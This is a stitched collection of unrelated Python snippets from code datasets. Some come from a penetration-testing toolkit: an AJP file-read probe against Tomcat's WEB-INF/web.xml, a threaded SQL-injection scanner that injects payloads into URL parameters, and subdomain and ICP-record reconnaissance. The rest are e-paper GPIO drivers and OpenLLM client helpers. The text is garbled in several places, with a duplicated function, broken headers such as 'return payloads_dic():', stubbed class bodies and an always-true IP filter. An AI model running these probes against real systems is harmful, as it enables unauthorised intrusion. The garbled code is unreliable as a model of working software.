help='Num of scan threads, 200 by default')
parser.add_option('-p', '--process', dest='process', default=6, type=int,
help='Num of scan Process, 6 by default')
parser.add_option('-o', '--output', dest='output', default=None,
type='string', help='Output file name. default is {target}.txt')
(options, args) = parser.parse_args()
if len(args) < 1:
parser.print_help()
sys.exit(0)
return options, args | null |
189,285 | import sys
import os
from gevent.pool import Pool
import dns.resolver
from Plugins.infoGather.subdomain.lijiejie.lib.consle_width import getTerminalSize
def is_intranet(ip):
ret = ip.split('.')
if len(ret) != 4:
return True
if ret[0] == '10':
return True
if ret[0] == '172' and 16 <= int(ret[1]) <= 32:
return True
if ret[0] == '192' and ret[1] == '168':
return True
return False | null |
189,286 | def _getTerminalSize_windows():
res = None
try:
from ctypes import windll, create_string_buffer
# stdin handle is -10
# stdout handle is -11
# stderr handle is -12
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
except:
return None
if res:
import struct
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
return sizex, sizey
else:
return None
def _getTerminalSize_tput():
# get terminal width
# src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
try:
import subprocess
proc = subprocess.Popen(["tput", "cols"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
output = proc.communicate(input=None)
cols = int(output[0])
proc = subprocess.Popen(["tput", "lines"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
output = proc.communicate(input=None)
rows = int(output[0])
return (cols, rows)
except:
return None
def _getTerminalSize_linux():
def ioctl_GWINSZ(fd):
try:
import fcntl, termios, struct, os
cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
except:
return None
return cr
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
try:
env = os.environ
cr = (env['LINES'], env['COLUMNS'])
except:
return None
return int(cr[1]), int(cr[0])
def getTerminalSize():
import platform
current_os = platform.system()
tuple_xy = None
if current_os == 'Windows':
tuple_xy = _getTerminalSize_windows()
if tuple_xy is None:
tuple_xy = _getTerminalSize_tput()
# needed for window's python in cygwin's xterm!
if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'):
tuple_xy = _getTerminalSize_linux()
if tuple_xy is None:
tuple_xy = (80, 25) # default value
return tuple_xy | null |
189,287 | import requests
from bs4 import BeautifulSoup
import re
from urllib.parse import quote
import json
import math
from termcolor import cprint
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'}
beianbeianApi(domain):
cprint('Load beianbeianApi: ', 'green')
# 获取备案ID
beianId = ''
url = 'http://www.beianbeian.com/s-0/{}.html'.format(domain)
try:
res = requests.get(url=url, headers=headers, allow_redirects=False, verify=False, timeout=10)
except Exception as e:
print('[error] http://www.beianbeian.com is die \n{}'.format(e.args))
return []
text = res.text
# print(text)
soup_1 = BeautifulSoup(text, 'html.parser')
tbodys = soup_1.find_all('tbody', id='table_tr')
for tbody in tbodys:
a_hrefs = tbody.find_all('a')
for a_href in a_hrefs:
if '反查' in a_href.get_text():
beianId = a_href['href']
if beianId:
beianSearchUrl = 'http://www.beianbeian.com' + beianId
print('查询到备案号: {}'.format(beianSearchUrl))
else:
print('没有匹配到备案号')
return []
# 备案反查域名
beianbeianNewDomains = []
tempDict = {}
# url = r'http://www.beianbeian.com/search-1/%E6%B5%99B2-20080224.html'
try:
res = requests.get(url=beianSearchUrl, headers=headers, allow_redirects=False, verify=False, timeout=10)
except Exception as e:
print('[error] request : {}\n{}'.format(beianSearchUrl, e.args))
return []
text = res.text
# print(text)
soup = BeautifulSoup(text, 'html.parser')
tbodys = soup.find_all('tbody', id='table_tr')
for tbody in tbodys:
trs = tbody.find_all('tr')
for tr in trs:
tds = tr.find_all('td')
companyName = tds[4].get_text()
newDomain = tds[5].get_text().strip().replace('www.', '')
time = tds[6].get_text()
if newDomain not in tempDict:
tempDict[newDomain] = (companyName, newDomain, time)
beianbeianNewDomains.append((companyName, newDomain, time))
beianbeianNewDomains = list(set(beianbeianNewDomains))
print('beianbeianApi去重后共计{}个顶级域名'.format(len(beianbeianNewDomains)))
# for each in beianbeianNewDomains:
# print(each)
return beianbeianNewDomains
def chinazApi(domain):
cprint('Load chinazApi: ', 'green')
chinazNewDomains = []
companyName = ""
# 获取公司名
url = "https://micp.chinaz.com/?query={}".format(domain)
try:
res = requests.get(url=url, headers=headers, allow_redirects=False, verify=False, timeout=10)
except Exception as e:
print('[error] request : {}\n{}'.format(url, e.args))
return chinazNewDomains, companyName
text = res.text
companyName = re.search('<tr><td class="ww-3 c-39 bg-3fa">主办单位:</td><td class="z-tl">(.*)</td></tr>', text)
if companyName:
companyName = companyName.group(1)
else:
print("[{}] 没有匹配到公司名".format(domain))
return chinazNewDomains, companyName
# 获取备案号
url = 'https://micp.chinaz.com/Handle/AjaxHandler.ashx?action=GetBeiansl&query={}&type=host'.format(domain)
try:
res = requests.get(url=url, headers=headers, allow_redirects=False, verify=False, timeout=10)
except Exception as e:
print('[error] request : {}\n{}'.format(url, e.args))
return chinazNewDomains, companyName
text = res.text
beianResult = re.findall('SiteLicense:"([^"]*)",SiteName:"([^"]*)",MainPage:"([^"]*)",VerifyTime:"([^"]*)"', text)
if not beianResult:
print("[{}] 没有查到备案信息".format(domain))
return chinazNewDomains, companyName
for _ in beianResult:
# print(_)
beianId, siteName, newDomain, time = _
if newDomain.startswith('www.'):
newDomain = newDomain.replace("www.", '')
chinazNewDomains.append([beianId, siteName, newDomain, time])
# print('chinazApi去重后共计{}个顶级域名'.format(len(chinazNewDomains)))
return chinazNewDomains, companyName
def run_beian2domain(domain):
beianNewDomains = []
# beianbeianNewDomains = beianbeianApi(domain) # 失效
chinazNewDomains, companyName = chinazApi(domain)
tempDict = {}
for each in chinazNewDomains:
if each[1] not in tempDict:
tempDict[each[1]] = each
beianNewDomains.append(each)
# beianNewDomains = list(set(beianbeianNewDomains + chinazNewDomains))
# print('共计{}个顶级域名'.format(len(beianNewDomains)))
cprint('-' * 50 + '去重后共计{}个顶级域名'.format(len(beianNewDomains)) + '-' * 50, 'green')
for _ in beianNewDomains:
print(_)
cprint('去重后共计{}个顶级域名'.format(len(beianNewDomains)), 'red')
return beianNewDomains, companyName
if __name__ == '__main__':
domain = 'xxxxxx'
run_beian2domain(domain)
def beianbeianApi(domain):
cprint('Load beianbeianApi: ', 'green')
# 获取备案ID
beianId = ''
url = 'http://www.beianbeian.com/s-0/{}.html'.format(domain)
try:
res = requests.get(url=url, headers=headers, allow_redirects=False, verify=False, timeout=10)
except Exception as e:
print('[error] http://www.beianbeian.com is die \n{}'.format(e.args))
return []
text = res.text
# print(text)
soup_1 = BeautifulSoup(text, 'html.parser')
tbodys = soup_1.find_all('tbody', id='table_tr')
for tbody in tbodys:
a_hrefs = tbody.find_all('a')
for a_href in a_hrefs:
if '反查' in a_href.get_text():
beianId = a_href['href']
if beianId:
beianSearchUrl = 'http://www.beianbeian.com' + beianId
print('查询到备案号: {}'.format(beianSearchUrl))
else:
print('没有匹配到备案号')
return []
# 备案反查域名
beianbeianNewDomains = []
tempDict = {}
# url = r'http://www.beianbeian.com/search-1/%E6%B5%99B2-20080224.html'
try:
res = requests.get(url=beianSearchUrl, headers=headers, allow_redirects=False, verify=False, timeout=10)
except Exception as e:
print('[error] request : {}\n{}'.format(beianSearchUrl, e.args))
return []
text = res.text
# print(text)
soup = BeautifulSoup(text, 'html.parser')
tbodys = soup.find_all('tbody', id='table_tr')
for tbody in tbodys:
trs = tbody.find_all('tr')
for tr in trs:
tds = tr.find_all('td')
companyName = tds[4].get_text()
newDomain = tds[5].get_text().strip().replace('www.', '')
time = tds[6].get_text()
if newDomain not in tempDict:
tempDict[newDomain] = (companyName, newDomain, time)
beianbeianNewDomains.append((companyName, newDomain, time))
beianbeianNewDomains = list(set(beianbeianNewDomains))
print('beianbeianApi去重后共计{}个顶级域名'.format(len(beianbeianNewDomains)))
# for each in beianbeianNewDomains:
# print(each)
return beianbeianNewDomains | null |
189,288 |
def filter_internal_ip(ip_subnet):
ip_subnet_list = ip_subnet.split('.')
if ip_subnet_list[0] == '10' or '127':
return None
elif ip_subnet_list[0] == '172' and 15 < int(ip_subnet_list[1]) < 32:
return None
elif ip_subnet_list[0] == '192' and ip_subnet_list[1] == '168':
return None
else:
return ip_subnet | null |
189,289 | import struct
from tqdm import *
from colorama import Fore
import socket
from urllib.parse import urlparse
def pack_string(s):
if s is None:
return struct.pack(">h", -1)
l = len(s)
return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0) | null |
189,290 | import struct
from tqdm import *
from colorama import Fore
def unpack(stream, fmt):
import socket
from urllib.parse import urlparse
def unpack_string(stream):
size, = unpack(stream, ">h")
if size == -1: # null string
return None
res, = unpack(stream, "%ds" % size)
stream.read(1) # \0
return res | null |
189,291 | import struct
from tqdm import *
from colorama import Fore
class AjpForwardRequest(object):
def __init__(self, data_direction=None):
def pack_headers(self):
def pack_attributes(self):
def serialize(self):
def parse(self, raw_packet):
def send_and_receive(self, socket, stream, save_cookies=False):
import socket
from urllib.parse import urlparse
def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
fr.method = method
fr.protocol = "HTTP/1.1"
fr.req_uri = req_uri
fr.remote_addr = target_host
fr.remote_host = None
fr.server_name = target_host
fr.server_port = 80
fr.request_headers = {
'SC_REQ_ACCEPT': 'text/html',
'SC_REQ_CONNECTION': 'keep-alive',
'SC_REQ_CONTENT_LENGTH': '0',
'SC_REQ_HOST': target_host,
'SC_REQ_USER_AGENT': 'Mozilla',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'en-US,en;q=0.5',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'max-age=0'
}
fr.is_ssl = False
fr.attributes = []
return fr | null |
189,292 | import struct
from tqdm import *
from colorama import Fore
import socket
class Tomcat(object):
def __init__(self, target_host, target_port):
def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
from urllib.parse import urlparse
def detect_AJP_LFI(url):
ip = urlparse(url).netloc.split(':')[0]
port = 8009
file = 'WEB-INF/web.xml'
t = Tomcat(ip, port)
_, data = t.perform_request('/asdf', attributes=[
{'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
{'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', file]},
{'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
])
for d in data:
if b'Welcome to Tomcat' in d.data:
return True | null |
189,293 | from termcolor import cprint
import requests
import threading
import re
import hashlib
from urllib.parse import urlparse
from collections import OrderedDict
from xml.dom import minidom
from queue import Queue
import time
import traceback
from tqdm import *
from colorama import Fore
import urllib3
payloads_dict = OrderedDict()
return payloads_dic():
errors_regexp_dict = OrderedDict()
return errors_regexp_dict
class SQLInject(threading.Thread):
name = '注入'
def __init__(self, payloadLinks_queue, pbar, vul_list):
def run(self):
# 调用各种漏洞检测方法
def run_detect(self, url):
# 耗费的时间
def runTime(self, url):
# 通过正则匹配是否是报错注入
def checkErrorSQL(self, text):
def detect(param_Links):
global errors_regexp_dict
# payloads
payloads_dict = read_xml_payloads()
# 报错注入的正则规则
errors_regexp_dict = read_xml_errors()
# 带payload的动态链接
payloadLinks = []
# # 存储漏洞的名字和url
vul_list = []
for eachLink in param_Links:
try:
eachLink_parse = urlparse(eachLink)
query = eachLink_parse.query
for _ in query.split('&'):
paramName, paramValue = _.split('=')
for dbms in payloads_dict:
for payload in payloads_dict[dbms]:
newParamValue = paramValue + payload
newParam = paramName + '=' + newParamValue
newLink = eachLink.replace(_, newParam)
payloadLinks.append(newLink)
except Exception as e:
pass
payloadLinks_queue = Queue(-1) # 将存活的动态链接存入队列里
for _ in payloadLinks:
payloadLinks_queue.put(_)
threads = []
threadNum = 200 # 线程为20
pbar = tqdm(total=payloadLinks_queue.qsize(), desc="检测漏洞", ncols=150) # total是总数
for num in range(1, threadNum + 1):
t = SQLInject(payloadLinks_queue, pbar, vul_list) # 实例化漏洞类,传递参数:存活web的队列, 存储漏洞的列表
threads.append(t)
t.start()
for t in threads:
t.join()
pbar.close()
return vul_list | null |
189,294 | import RPi.GPIO as GPIO
import time
import os
import logging
import sys
from ctypes import *
def digital_read(pin):
return GPIO.input(pin) | null |
189,295 | import RPi.GPIO as GPIO
import time
import os
import logging
import sys
from ctypes import *
spi = None
if spi is None:
RuntimeError('Cannot find DEV_Config.so')
def spi_writebyte(value):
spi.DEV_SPI_WriteByte(value) | null |
189,296 | import RPi.GPIO as GPIO
import time
import os
import logging
import sys
from ctypes import *
EPD_SCK_PIN =11
EPD_MOSI_PIN =10
EPD_M1_CS_PIN =8
EPD_S1_CS_PIN =7
EPD_M2_CS_PIN =17
EPD_S2_CS_PIN =18
EPD_M1S1_DC_PIN =13
EPD_M2S2_DC_PIN =22
EPD_M1S1_RST_PIN =6
EPD_M2S2_RST_PIN =23
EPD_M1_BUSY_PIN =5
EPD_S1_BUSY_PIN =19
EPD_M2_BUSY_PIN =27
EPD_S2_BUSY_PIN =24
spi = None
if spi is None:
RuntimeError('Cannot find DEV_Config.so')
def digital_write(pin, value):
GPIO.output(pin, value)
def module_init():
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(EPD_SCK_PIN, GPIO.OUT)
GPIO.setup(EPD_MOSI_PIN, GPIO.OUT)
logging.debug("python call bcm2835 Lib")
GPIO.setup(EPD_M2S2_RST_PIN, GPIO.OUT)
GPIO.setup(EPD_M1S1_RST_PIN, GPIO.OUT)
GPIO.setup(EPD_M2S2_DC_PIN, GPIO.OUT)
GPIO.setup(EPD_M1S1_DC_PIN, GPIO.OUT)
GPIO.setup(EPD_S1_CS_PIN, GPIO.OUT)
GPIO.setup(EPD_S2_CS_PIN, GPIO.OUT)
GPIO.setup(EPD_M1_CS_PIN, GPIO.OUT)
GPIO.setup(EPD_M2_CS_PIN, GPIO.OUT)
GPIO.setup(EPD_S1_BUSY_PIN, GPIO.IN)
GPIO.setup(EPD_S2_BUSY_PIN, GPIO.IN)
GPIO.setup(EPD_M1_BUSY_PIN, GPIO.IN)
GPIO.setup(EPD_M2_BUSY_PIN, GPIO.IN)
digital_write(EPD_M1_CS_PIN, 1)
digital_write(EPD_S1_CS_PIN, 1)
digital_write(EPD_M2_CS_PIN, 1)
digital_write(EPD_S2_CS_PIN, 1)
digital_write(EPD_M2S2_RST_PIN, 0)
digital_write(EPD_M1S1_RST_PIN, 0)
digital_write(EPD_M2S2_DC_PIN, 1)
digital_write(EPD_M1S1_DC_PIN, 1)
spi.DEV_ModuleInit() | null |
189,297 | import RPi.GPIO as GPIO
import time
import os
import logging
import sys
from ctypes import *
EPD_M1_CS_PIN =8
EPD_S1_CS_PIN =7
EPD_M2_CS_PIN =17
EPD_S2_CS_PIN =18
EPD_M1S1_DC_PIN =13
EPD_M2S2_DC_PIN =22
EPD_M1S1_RST_PIN =6
EPD_M2S2_RST_PIN =23
def digital_write(pin, value):
GPIO.output(pin, value)
def module_exit():
digital_write(EPD_M2S2_RST_PIN, 0)
digital_write(EPD_M1S1_RST_PIN, 0)
digital_write(EPD_M2S2_DC_PIN, 0)
digital_write(EPD_M1S1_DC_PIN, 0)
digital_write(EPD_S1_CS_PIN, 1)
digital_write(EPD_S2_CS_PIN, 1)
digital_write(EPD_M1_CS_PIN, 1)
digital_write(EPD_M2_CS_PIN, 1) | null |
189,298 | import RPi.GPIO as GPIO
import time
import os
import logging
import sys
from ctypes import *
EPD_SCK_PIN =11
EPD_MOSI_PIN =10
def spi_readbyte(Reg):
GPIO.setup(EPD_MOSI_PIN, GPIO.IN)
j=0
# time.sleep(0.01)
for i in range(0, 8):
GPIO.output(EPD_SCK_PIN, GPIO.LOW)
# time.sleep(0.01)
j = j << 1
if(GPIO.input(EPD_MOSI_PIN) == GPIO.HIGH):
j |= 0x01
else:
j &= 0xfe
# time.sleep(0.01)
GPIO.output(EPD_SCK_PIN, GPIO.HIGH)
# time.sleep(0.01)
GPIO.setup(EPD_MOSI_PIN, GPIO.OUT)
return j | null |
189,299 | import itertools, os, token, tokenize
TOKEN_WHITELIST = [token.OP, token.NAME, token.NUMBER, token.STRING]
_ignored = ['_version.py']
_dir_package = {'openllm-python': 'openllm', 'openllm-core': 'openllm_core', 'openllm-client': 'openllm_client'}
def run_cz(args):
from tabulate import tabulate
headers = ['Name', 'Lines', 'Tokens/Line']
table = []
package = _dir_package[args.dir]
for path, _, files in os.walk(os.path.join(args.dir, 'src', package)):
for name in files:
if not name.endswith('.py') or name in _ignored:
continue
filepath = os.path.join(path, name)
with tokenize.open(filepath) as file_:
tokens = [t for t in tokenize.generate_tokens(file_.readline) if t.type in TOKEN_WHITELIST]
token_count, line_count = len(tokens), len(set([t.start[0] for t in tokens]))
table.append([
filepath.replace(os.path.join(args.dir, 'src'), ''),
line_count,
token_count / line_count if line_count != 0 else 0,
])
print(tabulate([headers, *sorted(table, key=lambda x: -x[1])], headers='firstrow', floatfmt='.1f') + '\n')
print(
tabulate(
[
(dir_name, sum([x[1] for x in group]))
for dir_name, group in itertools.groupby(
sorted([(x[0].rsplit('/', 1)[0], x[1]) for x in table]), key=lambda x: x[0]
)
],
headers=['Directory', 'LOC'],
floatfmt='.1f',
)
)
print(f'total line count for {package}: {sum([x[1] for x in table])}\n')
return 0 | null |
189,300 | import openllm_core
def __dir__():
coreutils = set(dir(openllm_core.utils)) | set([it for it in openllm_core.utils._extras if not it.startswith('_')])
return sorted(list(coreutils)) | null |
189,301 | import openllm_core
def __getattr__(name):
if hasattr(openllm_core.utils, name):
return getattr(openllm_core.utils, name)
raise AttributeError(f'module {__name__} has no attribute {name}') | null |
189,304 | from __future__ import annotations
import importlib.metadata
import logging
import os
import typing as t
import attr
from ._schemas import Helpers, Metadata, Response, StreamingResponse
from ._shim import MAX_RETRIES, AsyncClient, Client
def _address_converter(addr: str):
return addr if '://' in addr else 'http://' + addr | null |
189,305 | from __future__ import annotations
import asyncio
import email.utils
import logging
import platform
import random
import time
import typing as t
import anyio
import attr
import distro
import httpx
from ._stream import AsyncStream, Response, Stream
from ._typing_compat import Architecture, LiteralString, Platform
from ._utils import converter
def _address_converter(addr: str | httpx.URL) -> httpx.URL:
if isinstance(addr, httpx.URL):
url = addr
else:
url = httpx.URL(addr if '://' in addr else f'http://{addr}')
if not url.raw_path.endswith(b'/'):
url = url.copy_with(path=url.raw_path + b'/')
return url | null |
189,306 | from __future__ import annotations
import asyncio
import email.utils
import logging
import platform
import random
import time
import typing as t
import anyio
import attr
import distro
import httpx
from ._stream import AsyncStream, Response, Stream
from ._typing_compat import Architecture, LiteralString, Platform
from ._utils import converter
_T_co = t.TypeVar('_T_co', covariant=True)
_T = t.TypeVar('_T')
def _merge_mapping(a: t.Mapping[_T_co, _T], b: t.Mapping[_T_co, _T]) -> t.Dict[_T_co, _T]:
# does the merging and filter out None
return {k: v for k, v in {**a, **b}.items() if v is not None} | null |
189,307 | from __future__ import annotations
import asyncio
import email.utils
import logging
import platform
import random
import time
import typing as t
import anyio
import attr
import distro
import httpx
from ._stream import AsyncStream, Response, Stream
from ._typing_compat import Architecture, LiteralString, Platform
from ._utils import converter
Platform = Annotated[
LiteralString, Literal['MacOS', 'Linux', 'Windows', 'FreeBSD', 'OpenBSD', 'iOS', 'iPadOS', 'Android', 'Unknown'], str
]
def _platform() -> Platform:
system = platform.system().lower()
platform_name = platform.platform().lower()
if system == 'darwin':
return 'MacOS'
elif system == 'windows':
return 'Windows'
elif system == 'linux':
distro_id = distro.id()
if distro_id == 'freebsd':
return 'FreeBSD'
elif distro_id == 'openbsd':
return 'OpenBSD'
else:
return 'Linux'
elif 'android' in platform_name:
return 'Android'
elif 'iphone' in platform_name:
return 'iOS'
elif 'ipad' in platform_name:
return 'iPadOS'
if platform_name:
return f'Other:{platform_name}'
return 'Unknown' | null |
189,308 | from __future__ import annotations
import asyncio
import email.utils
import logging
import platform
import random
import time
import typing as t
import anyio
import attr
import distro
import httpx
from ._stream import AsyncStream, Response, Stream
from ._typing_compat import Architecture, LiteralString, Platform
from ._utils import converter
Architecture = Annotated[LiteralString, Literal['arm', 'arm64', 'x86', 'x86_64', 'Unknown'], str]
def _architecture() -> Architecture:
machine = platform.machine().lower()
if machine in {'arm64', 'aarch64'}:
return 'arm64'
elif machine in {'arm', 'aarch32'}:
return 'arm'
elif machine in {'x86_64', 'amd64'}:
return 'x86_64'
elif machine in {'x86', 'i386', 'i686'}:
return 'x86'
elif machine:
return f'Other:{machine}'
return 'Unknown' | null |
189,309 | from __future__ import annotations
import types
import typing as t
import attr
import orjson
from openllm_core._schemas import (
CompletionChunk as CompletionChunk,
GenerationOutput as Response, # backward compatibility
_SchemaMixin as _SchemaMixin,
)
from ._utils import converter
if t.TYPE_CHECKING:
from ._shim import AsyncClient, Client
class Metadata(_SchemaMixin):
"""NOTE: Metadata is a modified version of the original MetadataOutput from openllm-core.
The configuration is now structured into a dictionary for easy of use."""
model_id: str
timeout: int
model_name: str
backend: str
configuration: t.Dict[str, t.Any]
def _structure_metadata(data: t.Dict[str, t.Any], cls: type[Metadata]) -> Metadata:
try:
configuration = orjson.loads(data['configuration'])
generation_config = configuration.pop('generation_config')
configuration = {**configuration, **generation_config}
except orjson.JSONDecodeError as e:
raise RuntimeError(f'Malformed metadata configuration (Server-side issue): {e}') from None
try:
return cls(
model_id=data['model_id'],
timeout=data['timeout'],
model_name=data['model_name'],
backend=data['backend'],
configuration=configuration,
)
except Exception as e:
raise RuntimeError(f'Malformed metadata (Server-side issue): {e}') from None | null |
189,310 | from __future__ import annotations
from langchain.agents import AgentType, initialize_agent, load_tools
from langchain.llms import OpenLLM
import bentoml
from bentoml.io import Text
agent = initialize_agent(tools, llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION)
def chat(input_text: str):
return agent.run(input_text) | null |
189,311 | from __future__ import annotations
import uuid
from typing import Any, AsyncGenerator, Dict, TypedDict, Union
from bentoml import Service
from bentoml.io import JSON, Text
from openllm import LLM
llm = LLM[Any, Any]('HuggingFaceH4/zephyr-7b-alpha', backend='vllm')
class GenerateInput(TypedDict):
prompt: str
stream: bool
sampling_params: Dict[str, Any]
route='/v1/generate',
input=JSON.from_sample(
GenerateInput(prompt='What is time?', stream=False, sampling_params={'temperature': 0.73, 'logprobs': 1})
),
output=Text(content_type='text/event-stream'),
async def generate(request: GenerateInput) -> Union[AsyncGenerator[str, None], str]:
n = request['sampling_params'].pop('n', 1)
request_id = f'tinyllm-{uuid.uuid4().hex}'
previous_texts = [[]] * n
generator = llm.generate_iterator(request['prompt'], request_id=request_id, n=n, **request['sampling_params'])
async def streamer() -> AsyncGenerator[str, None]:
async for request_output in generator:
for output in request_output.outputs:
i = output.index
previous_texts[i].append(output.text)
yield output.text
if request['stream']:
return streamer()
async for _ in streamer(): pass
return ''.join(previous_texts[0]) | null |
189,312 | from __future__ import annotations
import typing as t
from langchain.chains import LLMChain
from langchain.llms import OpenLLM
from langchain.prompts import PromptTemplate
from pydantic import BaseModel
import bentoml
from bentoml.io import JSON, Text
def gen_llm(model_name: str, model_id: str | None = None, **attrs: t.Any) -> OpenLLM:
lc_llm = OpenLLM(model_name=model_name, model_id=model_id, embedded=False, **attrs)
lc_llm.runner.download_model()
return lc_llm | null |
189,313 | from __future__ import annotations
import typing as t
from langchain.chains import LLMChain
from langchain.llms import OpenLLM
from langchain.prompts import PromptTemplate
from pydantic import BaseModel
import bentoml
from bentoml.io import JSON, Text
class Query(BaseModel):
industry: str
product_name: str
keywords: t.List[str]
llm_config: t.Dict[str, t.Any]
chain = LLMChain(llm=llm, prompt=prompt)
def generate(query: Query):
return chain.run(
{'industry': query.industry, 'product_name': query.product_name, 'keywords': ', '.join(query.keywords)}
) | null |
189,314 | from __future__ import annotations
import openllm_core, pydantic, typing as t
from openllm_core._configuration import ModelSettings
def get_special_token_id(tokenizer: transformers.PreTrainedTokenizer, key: str) -> int:
token_ids = tokenizer.encode(key)
if len(token_ids) > 1:
raise ValueError(f"Expected only a single token for '{key}' but found {token_ids}")
return token_ids[0] | null |